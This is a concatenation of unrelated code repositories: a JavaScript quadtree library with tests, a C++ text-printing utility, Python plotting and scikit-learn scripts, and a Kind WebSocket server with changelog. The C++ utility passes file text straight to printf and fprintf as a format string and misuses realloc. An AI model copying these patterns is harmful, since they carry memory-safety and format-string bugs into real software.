expect(allItems.length).toBe(13);
var subleaf_items = [];
unEmptyLeaves.forEach(function (subleaf) {
// Every unempty leaf should have more than 1 item
expect(subleaf.items.length).toBeGreaterThan(0);
subleaf_items = subleaf_items.concat(subleaf.items);
});
// Sum of items in unempty leaves should equal sum of items using getItems()
expect(subleaf_items.length).toEqual(allItems.length);
}, 400);
describe('Adding items should return the item added', function () {
var leaf = new Leaf(props);
var item = leaf.addItem({ x: 0, y: 0, val: 'A' });
expect(item.val).toBe('A');
var item = leaf.addItem({ x: 1, y: 0, val: 'B' });
expect(item.val).toBe('B');
var item = leaf.addItem({ x: 1, y: 1, val: 'C' });
expect(item.val).toBe('C');
var item = leaf.addItem({ x: 0, y: 1, val: 'D' });
expect(item.val).toBe('D');
var item = leaf.addItem({ x: 0.125, y: 0.125, val: 'E' });
expect(item.val).toBe('E');
var item = leaf.addItem({ x: 0.126, y: 0.126, val: 'F' });
expect(item.val).toBe('F');
var item = leaf.addItem({ x: 0.127, y: 0.127, val: 'G' });
expect(item.val).toBe('G');
var item = leaf.addItem({ x: 0.1252, y: 0.1252, val: 'H' });
expect(item.val).toBe('H');
var item = leaf.addItem({ x: 0.1252, y: 0.1252, val: 'I' });
expect(item.val).toBe('I');
var item = leaf.addItem({ x: 0.1252, y: 0.1253, val: 'J' });
expect(item.val).toBe('J');
var item = leaf.addItem({ x: 0.12511, y: 0.12511, val: 'K' });
expect(item.val).toBe('K');
var item = leaf.addItem({ x: 0.12512, y: 0.12512, val: 'L' });
expect(item.val).toBe('L');
var item = leaf.addItem({ x: 0.12513, y: 0.12513, val: 'M' });
expect(item.val).toBe('M');
});
describe('Should have correct number of leaves after removing item', function () {
var leaf = new Leaf(props);
leaf.addItem({ x: 0, y: 0, val: 'A' });
leaf.addItem({ x: 1, y: 0, val: 'B' });
leaf.addItem({ x: 1, y: 1, val: 'C' });
leaf.addItem({ x: 0, y: 1, val: 'D' });
// Adding this item causes a split resulting in 4 unempty leaves
var lastAddeditem = leaf.addItem({ x: 0.125, y: 0.125, val: 'E' });
expect(leaf.getUnEmptyLeaves().length).toBe(4);
// Removing the last added item should collapse the parent leaf, recalculating
// the subitems...
lastAddeditem.remove();
// ... now we should be back down to 1 leaf.
expect(leaf.getUnEmptyLeaves().length).toBe(1);
});
describe('Removing items should reduce the unempty leaf count accordingly', function () {
var leaf = new Leaf(props);
var item1 = leaf.addItem({ x: 0, y: 0, val: 'A' });
var item2 = leaf.addItem({ x: 1, y: 0, val: 'B' });
leaf.addItem({ x: 1, y: 1, val: 'C' });
leaf.addItem({ x: 0, y: 1, val: 'D' });
leaf.addItem({ x: 0.125, y: 0.125, val: 'E' });
leaf.addItem({ x: 0.126, y: 0.126, val: 'F' });
leaf.addItem({ x: 0.127, y: 0.127, val: 'G' });
leaf.addItem({ x: 0.1252, y: 0.1252, val: 'H' });
leaf.addItem({ x: 0.1252, y: 0.1252, val: 'I' });
leaf.addItem({ x: 0.1252, y: 0.1253, val: 'J' });
leaf.addItem({ x: 0.12511, y: 0.12511, val: 'K' });
leaf.addItem({ x: 0.12512, y: 0.12512, val: 'L' });
leaf.addItem({ x: 0.12513, y: 0.12513, val: 'M' });
expect(leaf.getUnEmptyLeaves().length).toBe(7);
item1.remove();
item2.remove();
expect(leaf.getUnEmptyLeaves().length).toBe(6);
});
test.run();
<file_sep>/leaf.js
/**
* Carlton Quadtree
* - A Quad Tree implementation in ESNext
* - <NAME> (f1lt3r)
* - MIT License
*
* Demos: http://f1lt3r.github.io/carlton-quadtree
*
* Example:
*
* const myLeaf = new Leaf({
* bounds: {
* top: 0,
* right: 0,
* bottom: 0,
* left: 0
* }
* })
*
* myLeaf.addItem({
* x:0, y:0, val: 123
* })
*
* console.log(myLeaf.getItems())
*/
let leafCount = 0
let itemCount = 0
const isInBounds = (item, bounds) => {
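// Bounds are half-open: top/left inclusive, bottom/right exclusive, so the four sub-leaves of a split never overlap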
if (item.x >= bounds.left &&
item.x < bounds.right &&
item.y >= bounds.top &&
item.y < bounds.bottom) {
return true
}
return false
}
const shuffle = (items, leaves) => {
items.forEach(subitem => {
leaves.forEach(subleaf => {
if (isInBounds(subitem, subleaf.bounds)) {
subleaf.addItem(subitem)
return false
}
})
})
}
const place = (item, leaves) => {
let subleaf
for (let i = 0; i < 4; i += 1) {
subleaf = leaves[i]
if (isInBounds(item, subleaf.bounds)) {
return subleaf.addItem(item)
}
}
}
const validLeaf = props => {
if (props === undefined) {
return false
}
if (!props.bounds) {
return false
}
if (Reflect.has(props, 'bounds')) {
if (!Reflect.has(props.bounds, 'top') ||
!Reflect.has(props.bounds, 'left') ||
!Reflect.has(props.bounds, 'bottom') ||
!Reflect.has(props.bounds, 'right')) {
return false
}
}
return true
}
const validItem = item => {
if (item === undefined) {
return false
}
if ((typeof item).toString() === 'object') {
if (!Reflect.has(item, 'x') ||
!Reflect.has(item, 'y') ||
!Reflect.has(item, 'val')) {
return false
}
}
return true
}
class Item {
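// Decorates the plain item object with an index, a back-reference to its leaf and a remove() helper, and returns that object from the constructor instead of the Item instance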
constructor(item, leaf) {
itemCount += 1
this.uid = itemCount
this.index = leaf.items.push(item) - 1
item.items = leaf.items
item.leaf = leaf
item.remove = () => {
leaf.items.splice(this.index, 1)
leaf.parent.collapse()
}
return item
}
}
class Leaf {
constructor(props) {
this.valid = validLeaf(props)
if (!this.valid) {
return
}
leafCount += 1
this.bounds = props.bounds
this.depth = props.depth + 1 || 0
this.uid = leafCount
this.leaves = []
this.items = []
this.parent = props.parent || {root: true}
}
getItems() {
if (this.items.length > 0) {
return this.items
}
if (this.leaves.length > 0) {
return this.leaves[0].getItems()
.concat(
this.leaves[1].getItems(),
this.leaves[2].getItems(),
this.leaves[3].getItems())
}
return []
}
getUnEmptyLeaves() {
if (this.items.length > 0) {
return [this]
}
if (this.leaves.length > 0) {
return this.leaves[0].getUnEmptyLeaves()
.concat(
this.leaves[1].getUnEmptyLeaves(),
this.leaves[2].getUnEmptyLeaves(),
this.leaves[3].getUnEmptyLeaves())
}
return []
}
addItem(item) {
if (!validItem(item)) {
return {
valid: false
}
}
if (this.leaves.length > 0) {
return place(item, this.leaves)
}
if (this.items.length < 4) {
return new Item(item, this)
}
if (this.items.length === 4) {
split(this)
shuffle(this.items, this.leaves)
this.items = []
return place(item, this.leaves)
}
}
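// Rebuild this leaf from scratch: gather every descendant item, drop the sub-leaves, then re-insert the items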
collapse() {
const subitems = this.getItems()
this.leaves = []
for (let i = 0, l = subitems.length; i < l; i++) {
this.addItem(subitems[i])
}
}
}
const split = leaf => {
const midX = leaf.bounds.left +
((leaf.bounds.right - leaf.bounds.left) / 2)
const midY = leaf.bounds.top +
((leaf.bounds.bottom - leaf.bounds.top) / 2)
const subBoundsTopLeft = {
top: leaf.bounds.top,
left: leaf.bounds.left,
right: midX,
bottom: midY
}
const subBoundsTopRight = {
top: leaf.bounds.top,
left: midX,
right: leaf.bounds.right,
bottom: midY
}
const subBoundsBottomRight = {
top: midY,
left: midX,
right: leaf.bounds.right,
bottom: leaf.bounds.bottom
}
const subBoundsBottomLeft = {
top: midY,
left: leaf.bounds.left,
right: midX,
bottom: leaf.bounds.bottom
}
leaf.leaves.push(
new Leaf({
bounds: subBoundsTopLeft,
depth: leaf.depth, parent: leaf
}),
new Leaf({
bounds: subBoundsTopRight,
depth: leaf.depth, parent: leaf
}),
new Leaf({
bounds: subBoundsBottomRight,
depth: leaf.depth, parent: leaf
}),
new Leaf({
bounds: subBoundsBottomLeft,
depth: leaf.depth, parent: leaf
})
)
}
// Constructor export depends on environment
if (typeof module === 'undefined') {
window.Leaf = Leaf
} else {
module.exports = Leaf
}
<file_sep>/README.md
# Carlton Quadtree
An infinitely divisible QuadTree implementation in ESNext.

[](https://f1lt3r.github.io/carlton-quadtree/examples/example-01.html)
[](https://f1lt3r.github.io/carlton-quadtree/examples/example-02.html)
[](https://f1lt3r.github.io/carlton-quadtree/examples/example-03.html)
[](https://f1lt3r.github.io/carlton-quadtree/examples/example-04.html)
[](https://f1lt3r.github.io/carlton-quadtree/examples/example-05.html)
[](https://f1lt3r.github.io/carlton-quadtree/examples/example-06.html)
[](https://f1lt3r.github.io/carlton-quadtree/examples/example-07.html)
[](https://f1lt3r.github.io/carlton-quadtree/examples/example-08.html)
[](https://f1lt3r.github.io/carlton-quadtree/examples/example-09.html)
[](https://f1lt3r.github.io/carlton-quadtree/examples/example-10.html)
[](https://f1lt3r.github.io/carlton-quadtree/examples/example-11.html)
<file_sep>/test-runner.js
var tests = []
, begunTests = false
, current_test = null
, failures = 0
;
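// Minimal ad-hoc test runner: describe() queues specs, expect() records assertions, run() executes everything and reports failures and timeouts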
function expect (expect) {
var assert = {
expected: expect
};
current_test.asserts.push(assert);
return {
// Type check ===
toBe: function (actual) {
assert.actual = actual;
assert.type = "toBe";
if (expect === actual) {
return pass(assert);
}
if (expect !== actual) {
return fail(assert);
}
},
// Truthy check ==
toEqual: function (actual) {
assert.actual = actual;
assert.type = "toEqual";
if (expect == actual) {
return pass(assert);
}
if (expect != actual) {
return fail(assert);
}
},
toBeGreaterThan: function (actual) {
assert.actual = actual;
assert.type = "toBeGreaterThan";
if (expect > actual) {
return pass(assert);
}
if (expect <= actual) {
return fail(assert);
}
},
}
}
function pass () {
// console.log('.');
return true;
}
function fail (assert) {
failures += 1;
console.log('Fail: "'+(current_test.desc)+'",');
console.log('\tExpected: '+('('+(typeof assert.expected)+') "'+assert.expected)+'" ' +
assert.type+': '+('('+(typeof assert.actual)+') "'+assert.actual)+'"');
return false;
}
function failTimeout (elapsed) {
failures += 1;
console.log('Fail: "'+current_test.desc+'",');
console.log('\tTimeout expected: < '+current_test.timeout + ' ms, Actual: '+elapsed+' ms.');
return false;
}
function describe (should, callback, ms) {
tests.push({
desc: should,
spec: callback,
asserts: [],
timeout: ms
});
if (begunTests) {
runTests();
}
}
function runTests () {
// overwrite describe for inner tests (maybe not a great idea)
describe = function (should, callback, ms) {
var start = + new Date();
(function (spec) {
spec();
}) (callback);
var now = + new Date()
, elapsed = now - start
;
if (ms) {
if (elapsed > ms) {
failTimeout(elapsed);
}
}
}
var startTests = + new Date();
tests.forEach(function (test) {
current_test = test;
var start = + new Date();
(function (spec) {
spec();
}) (test.spec);
var now = + new Date()
, elapsed = now - start
;
if (test.timeout) {
if (elapsed > test.timeout) {
failTimeout(elapsed);
}
}
});
var endTests = + new Date()
, elapsed = endTests - startTests
;
if (failures === 0) {
console.log('All Tests pass in ' +(elapsed/1000) + ' seconds.');
}
}
module.exports = {
describe: describe,
expect: expect,
run: runTests,
};
// describe('Tests should work', function () {
// expect(1).toBe(1);
// expect(2).toBe(2);
// expect(3).toBe(3);
// expect(4).toBe(4);
// });
// describe('Tests should fail', function () {
// expect('').toEqual(0);
// });
|
1904f1107ac52c325b2d4be5e9f747b60f891f02
|
[
"JavaScript",
"Markdown"
] | 4
|
JavaScript
|
F1LT3R/carlton-quadtree
|
ae26befef23b193fb7509529f09b22fd6aa9b0db
|
d91ea592dc31ae37cacb0243e42444f31ad04604
|
refs/heads/master
|
<repo_name>SomeChars/Cpp-Repository<file_sep>/ConsoleApplication7.cpp
#include "pch.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void read_vvod(int args,char *vvod[]);
char str[100];
char **lib = (char**)malloc(100*sizeof(char*));
char **lib_begin = lib;
int counter = 0;
FILE* filetowrite;
int main(int argc,char *argv[])
{
if (argc < 2) {
printf("No option given. Run with HELP for a list of commands.\n");
return 0;
}
if (!strcmp(argv[1], "HELP")) {
printf("***List of commands*** -n:Numeration, -b:Numeration without spaces, -$:$ before string, -s:Trim all repeats, -T:Tabulation shown like ^|, -p:Just print, -+:Associate files into a file that goes last");
}
else
{
read_vvod(argc,argv);
}
}
void read_vvod(int args,char *vvod[]) {
int counter = 0;
int count_origin_strings = 0;
int count = 0;
int trimmed_counter = 0;
int flag = 0;
if (!strcmp(vvod[1], "-+")) {
filetowrite = fopen(vvod[args - 1], "w");
}
for (int i = 2;i < args;i++) {
if (i == args - 1) {
if (!strcmp(vvod[1], "-+")) {
break;
}
}
FILE* file;
if (file = fopen(vvod[i], "r")) {
while (fgets(str, 100, file)) {
counter++;
if (!strcmp(vvod[1], "-n")) {
printf("%d %s", count, str);
count++;
}
if (!strcmp(vvod[1], "-b")) {
if (strcmp(str, "")) {
printf("%d %s", trimmed_counter, str);
trimmed_counter++;
}
else
{
printf("%s", str);
}
}
if (!strcmp(vvod[1], "-$")) {
printf("$ %s", str);
}
if (!strcmp(vvod[1], "-s")) {
counter++;
if (count_origin_strings > 100) {
lib = (char**) realloc(lib_begin,count_origin_strings*sizeof(char*));
}
for (int i = 0;i < count_origin_strings;i++) {
if (!strcmp(str, (*lib))) {
flag = 1;
}
*lib++;
}
if (!flag) {
printf("%s", str);
(*lib) = (char*)malloc(100 * sizeof(char));
strcpy((*lib), str);
count_origin_strings++;
}
flag = 0;
lib = lib_begin;
}
if (!strcmp(vvod[1], "-T")) {
char c1;
char c2;
int number_of_tabs = 0;
int flag = 0;
for (int j = 0; j < strlen(str) + number_of_tabs; j++) {
if (str[j] == '\t') {
number_of_tabs++;
str[j] = '^';
c2 = str[j + 1];
str[j + 1] = '|';
for (int k = j + 2; k < strlen(str) + number_of_tabs;k++) {
if (flag % 2 == 0) {
c1 = str[k];
str[k] = c2;
}
else
{
c2 = str[k];
str[k] = c1;
}
flag++;
}
flag = 0;
}
}
printf("%s", str);
}
if (!strcmp(vvod[1], "-p")) {
printf(str);
}
if (!strcmp(vvod[1], "-+")) {
fprintf(filetowrite, str);
}
}
// Close the input file once it has been fully read
fclose(file);
}
else {
printf("%s %s\n","No file with this path:", vvod[i]);
}
}
// Close the output file if one was opened for the -+ option
if (!strcmp(vvod[1], "-+")) {
fclose(filetowrite);
}
}
<file_sep>/FundVisual.py
import pandas as pd
import matplotlib.pyplot as plt
import matplotlib.ticker
import numpy as np
capital = {'MSK':[],'SPB':[]}
crisis = {'MSK':[],'SPB':[]}
dates = []
file1 = open("F:Data.txt", "r")
for line in (file1):
a = [i for i in line.split(' ')]
if str(a[1]) not in capital:
capital[str(a[1])] = []
capital[str(a[1])] += [float(a[2])]
if str(a[1]) not in crisis:
crisis[str(a[1])] = []
crisis[str(a[1])] += [float(a[3])]
if a[0] not in dates:
dates.append(a[0])
dates.pop()
file1.close()
fig = plt.figure()
ax1 = fig.add_subplot(111)
for i in capital:
ax1.plot(capital[i])
ax1.set_xlabel('Date')
ax1.set_ylabel('Capital')
ax1.legend([city for city in capital],loc = 'center right')
ax1.set_title('Vizualization')
plt.xticks(np.arange(len(dates)),dates)
ax1.grid(True)
fig = plt.figure()
ax2 = fig.add_subplot(111)
for i in crisis:
ax2.plot(crisis[i])
ax2.set_xlabel('Date')
ax2.set_ylabel('Crisis')
ax2.legend([city for city in crisis],loc = 'center right')
ax2.set_title('Vizualization')
plt.xticks(np.arange(len(dates)),dates)
ax2.grid(True)
plt.show()
#df = pd.DataFrame('Date','City','Capital','Crisis')
|
e213424052c556842539a172a183d7b42bbc423d
|
[
"Python",
"C++"
] | 2
|
C++
|
SomeChars/Cpp-Repository
|
1e48249c746bc98ac9cef817178663c3f1d1bbe5
|
fbe64fb2ab9e08cb391846475429b342b87b1499
|
refs/heads/master
|
<repo_name>amruthakm98/firstproject<file_sep>/regression.py
import numpy as np
from sklearn import linear_model, datasets, tree
import matplotlib.pyplot as plt
#%matplotlib inline
number_of_samples = 100
x = np.linspace(-np.pi, np.pi, number_of_samples)
y = 0.5*x+np.sin(x)+np.random.random(x.shape)
plt.scatter(x,y,color='black') #Plot y-vs-x in dots
plt.xlabel('x-input feature')
plt.ylabel('y-target values')
plt.title('Fig 1: Data for linear regression')
plt.show()
random_indices = np.random.permutation(number_of_samples)
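#Shuffle the sample indices, then split them 70/15/15 into training, validation and test sets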
#Training set
x_train = x[random_indices[:70]]
y_train = y[random_indices[:70]]
#Validation set
x_val = x[random_indices[70:85]]
y_val = y[random_indices[70:85]]
#Test set
x_test = x[random_indices[85:]]
y_test = y[random_indices[85:]]
model = linear_model.LinearRegression() #Create a least squared error linear regression object
#sklearn takes the inputs as matrices. Hence we reshape the arrays into column matrices
x_train_for_line_fitting = np.matrix(x_train.reshape(len(x_train),1))
y_train_for_line_fitting = np.matrix(y_train.reshape(len(y_train),1))
#Fit the line to the training data
model.fit(x_train_for_line_fitting, y_train_for_line_fitting)
#Plot the line
plt.scatter(x_train, y_train, color='black')
plt.plot(x.reshape((len(x),1)),model.predict(x.reshape((len(x),1))),color='blue')
plt.xlabel('x-input feature')
plt.ylabel('y-target values')
plt.title('Fig 2: Line fit to training data')
plt.show()
#Flatten the (n,1) predictions to match the 1-D target arrays before computing the MSE
mean_val_error = np.mean( (y_val - model.predict(x_val.reshape(len(x_val),1)).ravel())**2 )
mean_test_error = np.mean( (y_test - model.predict(x_test.reshape(len(x_test),1)).ravel())**2 )
print ('Validation MSE: ', mean_val_error, '\nTest MSE: ', mean_test_error)
#******************************CLASSIFICATION**********************************
iris = datasets.load_iris()
X = iris.data[:,:2] #Choosing only the first two input-features
Y = iris.target
#The first 50 samples are class 0 and the next 50 samples are class 1
X = X[:100]
Y = Y[:100]
number_of_samples = len(Y)
#Splitting into training, validation and test sets
random_indices = np.random.permutation(number_of_samples)
#Training set
num_training_samples = int(number_of_samples*0.7)
x_train = X[random_indices[:num_training_samples]]
y_train = Y[random_indices[:num_training_samples]]
#Validation set
num_validation_samples = int(number_of_samples*0.15)
x_val = X[random_indices[num_training_samples : num_training_samples+num_validation_samples]]
y_val = Y[random_indices[num_training_samples: num_training_samples+num_validation_samples]]
#Test set
num_test_samples = int(number_of_samples*0.15)
x_test = X[random_indices[-num_test_samples:]]
y_test = Y[random_indices[-num_test_samples:]]
#Visualizing the training data
X_class0 = np.asmatrix([x_train[i] for i in range(len(x_train)) if y_train[i]==0]) #Picking only the first two classes
Y_class0 = np.zeros((X_class0.shape[0]),dtype=int)
X_class1 = np.asmatrix([x_train[i] for i in range(len(x_train)) if y_train[i]==1])
Y_class1 = np.ones((X_class1.shape[0]),dtype=int)
plt.scatter(X_class0[:,0], X_class0[:,1],color='red')
plt.scatter(X_class1[:,0], X_class1[:,1],color='blue')
plt.xlabel('sepal length')
plt.ylabel('sepal width')
plt.legend(['class 0','class 1'])
plt.title('Fig 3: Visualization of training data')
plt.show()
<file_sep>/stockreg.py
import pandas as pd
import quandl
#&api_key=<KEY>
df=quandl.get("SSE/GGQ1")
print(df.head())
<file_sep>/iris.py
import numpy as np
from sklearn import linear_model, datasets
import matplotlib.pyplot as plt
#1. Prepare data (use iris dataset)
iris = datasets.load_iris()
X = iris.data[:, :2] #choosing only the first 2 input features
Y = iris.target
#The first 50 samples are class 0 and the next 50 samples are class 1
X = X[:100]
Y = Y[:100]
number_of_samples = len(Y)
#Splitting into training, validation and test sets:
random_indices = np.random.permutation(number_of_samples)
#Training set:
num_training_samples = int(number_of_samples*0.7)
x_train = X[random_indices[:num_training_samples]]
y_train = Y[random_indices[:num_training_samples]]
#Validation set:
num_validation_samples = int(number_of_samples*0.15)
x_val = X[random_indices[num_training_samples:num_training_samples+num_validation_samples]]
y_val = Y[random_indices[num_training_samples:num_training_samples+num_validation_samples]]
#Test set:
num_test_samples = int(number_of_samples*0.15)
x_test = X[random_indices[-num_test_samples:]]
y_test = Y[random_indices[-num_test_samples:]]
#Visualizing the training data:
X_class_0 = np.asmatrix([x_train[i] for i in range(len(x_train)) if y_train[i] == 0])
Y_class_0 = np.zeros((X_class_0.shape[0]), dtype=int)
X_class_1 = np.asmatrix([x_train[i] for i in range(len(x_train)) if y_train[i] == 1])
Y_class_1 = np.ones((X_class_1.shape[0]), dtype=int)
plt.scatter([X_class_0[:, 0]],[X_class_0[:, 1]], edgecolors='red')
plt.scatter([X_class_1[:, 0]],[X_class_1[:, 1]], edgecolors='blue')
plt.xlabel('sepal length')
plt.ylabel('sepal width')
plt.legend(['class 0', 'class 1'])
plt.title('Fig 1 : Visualization of the training data')
plt.show()
#2. Fit the logistic regression model:
model = linear_model.LogisticRegression(C=1e5) #C is the inverse of the regularization factor
full_X = np.concatenate((X_class_0, X_class_1), axis=0)
full_Y = np.concatenate((Y_class_0, Y_class_1), axis=0)
model.fit(full_X, full_Y)
#3. Display the decision boundary:
#Visualization code taken from : http://scikit-learn.org
#For plotting the decision boundary, we will assign a color to each point in the mesh:
h = 0.2 #step size in the mesh
x_min, x_max = full_X[:, 0].min() - .5, full_X[:, 0].max() + .5
y_min, y_max = full_X[:, 1].min() - .5, full_X[:, 1].max() + .5
xx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))
#predict for the entire mesh to find the regions for each class
Z = model.predict(np.c_[xx.ravel(), yy.ravel()])
#Put the result into a color plot
Z = Z.reshape(xx.shape)
plt.figure()
plt.pcolormesh(xx, yy, Z, cmap = plt.cm.Paired)
#Plot also the training points:
plt.scatter([X_class_0[:, 0]],[X_class_0[:, 1]], c='red', edgecolors='k', cmap=plt.cm.Paired)
plt.scatter([X_class_1[:, 0]],[X_class_1[:, 1]], c='blue', edgecolors='k', cmap=plt.cm.Paired)
plt.xlabel('sepal length')
plt.ylabel('sepal width')
plt.title('Fig 2 : Visualization of the decision boundary')
plt.xlim(xx.min(), xx.max())
plt.ylim(yy.min(), yy.max())
plt.show()
#4. Evaluate the model:
validation_set_predictions = [model.predict(x_val[i].reshape((1,2)))[0] for i in range(x_val.shape[0])]
validation_misclassification_percentage = 0
for i in range(len(validation_set_predictions)):
if validation_set_predictions[i] != y_val[i]:
validation_misclassification_percentage += 1
validation_misclassification_percentage *= 100/len(y_val)
print("Validation misclassification precentage = ", validation_misclassification_percentage, "%")
test_set_predictions = [model.predict(x_test[i].reshape((1,2)))[0] for i in range(x_test.shape[0])]
test_misclassification_percentage = 0
for i in range(len(test_set_predictions)):
if test_set_predictions[i] != y_test[i]:
test_misclassification_percentage += 1
test_misclassification_percentage *= 100/len(y_test)
print("Test misclassification precentage = ", test_misclassification_percentage, "%")
|
a535cf185cfc07a96b174c8f749b6b60c6906139
|
[
"Python"
] | 3
|
Python
|
amruthakm98/firstproject
|
95cd146713474840dd2a51338b6a77273d5bace2
|
c45b74dfaca6421bbdbc2fab8274e3c6f44fb64f
|
refs/heads/master
|
<repo_name>Kix205/Kind<file_sep>/web/events/server.js
var port = Number(process.argv[2] || "7171");
var ws = require('ws');
var fs = require("fs-extra");
var path = require("path");
var lib = require("./lib.js");
var ethsig = require("nano-ethereum-signer");
// Globals
// =======
var RoomPosts = {}; // Map RoomID [Uint8Array] -- past messages to sync w/ room
var Watchlist = {}; // Map RoomID [WsPeer] -- ws peers watching given room
var Connected = 0;
// Startup
// =======
// Creates the data directory
if (!fs.existsSync("data")) {
fs.mkdirSync("data");
}
// Loads existing posts
var files = fs.readdirSync("data");
for (var file of files) {
if (file.slice(-5) === ".room") {
var room_name = file.slice(0, -5);
var file_data = fs.readFileSync(path.join("data",file));
var room_posts = [];
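    // Each record in a .room file is a 4-byte length prefix followed by
    // `size` bytes of post payload (room, tick, user, data). The SHOW opcode
    // is prepended on load so the record can be sent to clients as-is.
    // Note: `size` is assigned in the loop body, so it already holds the
    // current record's length by the time the `i += 4 + size` increment runs.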
for (var i = 0; i < file_data.length; i += 4 + size) {
var size = lib.hex_to_u32(file_data.slice(i, i + 4).toString("hex"));
var head = Buffer.from([lib.SHOW]);
var body = file_data.slice(i + 4, i + 4 + size);
room_posts.push(new Uint8Array(Buffer.concat([head, body])));
}
console.log("Loaded "+room_posts.length+" posts on room "+room_name+".");
RoomPosts[room_name] = room_posts;
}
}
// Methods
// =======
// Returns current time
function get_time() {
return Date.now();
}
// Returns current tick
function get_tick() {
return Math.floor(Date.now() / 62.5);
}
// Adds a user to a room's watchlist
function watch_room(room_name, ws) {
// Creates watcher list
if (!Watchlist[room_name]) {
Watchlist[room_name] = [];
}
// Gets watcher list
var watchlist = Watchlist[room_name];
// Makes sure user isn't watching already
for (var i = 0; i < watchlist.length; ++i) {
if (watchlist[i] === ws) {
return;
};
}
// Sends old messages
if (RoomPosts[room_name]) {
for (var i = 0; i < RoomPosts[room_name].length; ++i) {
ws.send(RoomPosts[room_name][i]);
}
}
// Adds user to watcher list
watchlist.push(ws);
};
// Removes a user from a room's watchlist
function unwatch_room(room_name, ws) {
// Gets watcher list
var watchlist = Watchlist[room_name] || [];
// Removes user from watcher list
for (var i = 0; i < watchlist.length; ++i) {
if (watchlist[i] === ws) {
for (var j = i; j < watchlist.length - 1; ++j) {
watchlist[j] = watchlist[j + 1];
};
return;
}
};
};
// Saves a post (room id, user address, data)
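// Two serializations are built below: `post_buff` (SHOW opcode + room + tick +
// user + data) is broadcast to watchers, while `post_seri` (4-byte payload
// length + the same fields) is appended to the room's file on disk.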
function save_post(post_room, post_user, post_data) {
var post_room = lib.check_hex(64, post_room);
var post_tick = lib.u64_to_hex(get_tick());
var post_user = lib.check_hex(160, post_user);
var post_data = lib.check_hex(null, post_data);
var post_list = [post_room, post_tick, post_user, post_data];
var post_buff = lib.hexs_to_bytes([lib.u8_to_hex(lib.SHOW)].concat(post_list));
var post_seri = lib.hexs_to_bytes([lib.u32_to_hex(post_buff.length-1)].concat(post_list));
var post_file = path.join("data", post_room+".room");
var log_msg = "";
log_msg += "Saving post!\n";
log_msg += "- post_room: " + post_room + "\n";
log_msg += "- post_user: " + post_user + "\n";
log_msg += "- post_data: " + post_data + "\n";
log_msg += "- post_file: " + post_room+".room" + "\n";
// Creates reconnection array for this room
if (!RoomPosts[post_room]) {
RoomPosts[post_room] = [];
}
// Adds post to reconnection array
RoomPosts[post_room].push(post_buff);
// Broadcasts
if (Watchlist[post_room]) {
log_msg += "- broadcasting to " + Watchlist[post_room].length + " watcher(s).\n";
for (var ws of Watchlist[post_room]) {
ws.send(post_buff);
}
}
// Create file for this room
if (!fs.existsSync(post_file)) {
fs.closeSync(fs.openSync(post_file, "w"));
}
// Adds post to file
fs.appendFileSync(post_file, Buffer.from(post_seri));
// Log messages
console.log(log_msg);
};
// TCP API
// =======
const wss = new ws.Server({port});
wss.binaryType = "arraybuffer";
wss.on("connection", function connection(ws) {
console.log("["+(++Connected)+" connected]");
ws.on("message", function incoming(data) {
var msge = new Uint8Array(data);
switch (msge[0]) {
// User wants to watch a room
case lib.WATCH:
var room = lib.bytes_to_hex(msge.slice(1, 9));
watch_room(room, ws);
break;
// User wants to unwatch a room
case lib.UNWATCH:
var room = lib.bytes_to_hex(msge.slice(1, 9));
unwatch_room(room, ws);
break;
// User wants to know the time
case lib.TIME:
var msge_buff = lib.hexs_to_bytes([
lib.u8_to_hex(lib.TIME),
lib.u64_to_hex(Date.now()),
lib.bytes_to_hex(msge.slice(1, 9)),
]);
ws.send(msge_buff);
break;
// User wants to post a message
case lib.POST:
var post_room = lib.bytes_to_hex(msge.slice(1, 9));
var post_data = lib.bytes_to_hex(msge.slice(9, msge.length - 65));
var post_sign = lib.bytes_to_hex(msge.slice(msge.length - 65, msge.length));
var post_hash = ethsig.keccak("0x"+lib.hexs_to_bytes([post_room, post_data])).slice(2);
var post_user = ethsig.signerAddress("0x"+post_hash, "0x"+post_sign).slice(2);
save_post(post_room, post_user, post_data);
break;
};
});
ws.on("close", function() {
for (var room_name in Watchlist) {
Watchlist[room_name] = Watchlist[room_name].filter(watcher => watcher !== ws);
};
console.log("["+(--Connected)+" connected]");
});
});
console.log("Started server on ws://localhost:"+port+".");
<file_sep>/CHANGELOG.md
## Kind 1.0.108
- Allow "for" to be on the left side of a list comprehension
[for x in [0 to 10] where Nat.is_even(x): x * 2]
## Kind 1.0.104
- Implicit arguments are here!
```
id<A: $Type>(x: A): A
x
explicit: Nat
id<$Nat>(7)
implicit: Nat
id(7)
```
- Nullary function call can be used instead of `!`
```
let a = Map.new!
let b = Map.new()
```
This is helpful, because implicit arguments only trigger on calls.
## Kind 1.0.101
- Mutter syntax and improvements on the getter/setter syntax.
Now you can get/set deeply nested fields. For example, `list[0][0]` works and
returns a `Maybe`, and `list[0][0] <- 7` works as expected. Moreover, the `<=`
syntax can now be used to apply a function to the focused field. Example:
```
type Bar {
new(map: Map<List<List<Nat>>>)
}
type Foo {
new(bar: Bar)
}
Test: Maybe<Nat>
// Creates a value
let a = Foo.new(Bar.new({"list": [[1,2,3],[4,5,6],[7,8,9]]}))
// Applies a function to a nested element
let a = a@bar@map{"list"}[0][0] <= Nat.mul(10)
// Gets a nested element
a@bar@map{"list"}[0][0]
```
### Kind 1.0.91
- Forall now demands `->`
- Now you can assign types in lambda parameters as in
```
Test: _
(x: Nat, y) x + y
```
### Kind 1.0.85
- Optimize BBT.for
### Kind 1.0.81
- Add Scheme compilation options to CLI
### Kind 1.0.79
- Socket UDP primitives
Check Example.udp.sender and Example.udp.receiver
### Kind 1.0.75
- New syntaxes
- Use
use x = obj
rest
// Equivalent to:
let x = obj
open x
rest
- Let abort
let x = maybe abort k
rest
// Equivalent to:
case maybe as x {
none: k
some:
let x = x.value
rest
}
// Also works with 'use'
- List comprehension
[x * 10 for x in [1, 2, 3]]
// Returns:
[10, 20, 30]
- Map for-in:
for key:val in map with state:
loop
rest
let state = for key:val in map:
loop
rest
- Function composition:
f . g
// Equivalent to:
Function.comp!!!(f, g)
### Kind 1.0.64
- Monadic block improvements
- Now it accepts most outside notations (let, open, log, for, etc.)
- When you use a "for" without a "with", it becomes a monadic loop:
IO {
for i from 0 to 10:
IO.print(Nat.show(i))
for i from 100 to 110:
IO.print(Nat.show(i))
}
### Kind 1.0.63
- Generic derivers: stringifier, parser, serializer, deserializer. Example:
```
type MyType {
foo(n: List<Nat>, s: String, m: MyType)
bar
} deriving (stringifier, parser, serializer, deserializer)
Test: _
IO {
